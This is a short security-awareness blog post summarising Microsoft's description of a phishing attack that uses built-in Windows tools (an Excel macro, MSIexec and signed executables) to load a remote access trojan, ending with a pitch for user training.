A new set of tweets from Microsoft Security Intelligence walks through an attack that uses a number of built-in Windows toolsets to infect machines with the notorious malware.
Many attackers attempt to “live off the land”, leveraging executables, tools, and scripting languages that are built into the Windows operating system as a way to avoid detection. This latest attack documented by Microsoft does exactly that with the intent of installing a remote access trojan (RAT) that gives an attacker complete control over the infected endpoint.
Here’s how it works:
- The potential victim receives an email written in Korean containing an Excel spreadsheet as an attachment.
- When opened, the Excel file runs a macro that calls MSIexec.com
- MSIexec downloads a Microsoft Installer (MSI) file to be installed
- The MSI file contains a digitally signed executable (so it must be safe, right?) that decrypts and loads a second executable directly into memory
- The second executable downloads another digitally signed file, wsus.exe
- This file runs and loads the final payload – the FlawedArmmy RAT – into memory
This detailed set of steps is necessary for attackers to avoid detection. However, keep in mind that all the user experiences is the opening of the email and the clicking of the attachment – nothing more. THIS is why phishing is so successful: attackers automate all the malicious parts of the attack, only needing the unwitting user to simply start off the process.
Users that have gone through Security Awareness Training can easily spot the red flags in this type of attack; rather than appealing to their sense of curiosity, they instead err on the side of caution and assume the email to be malicious in nature. If you’re unsure about whether your users would fall for this scam or rise above it, consider enrolling them in continual Security Awareness Training.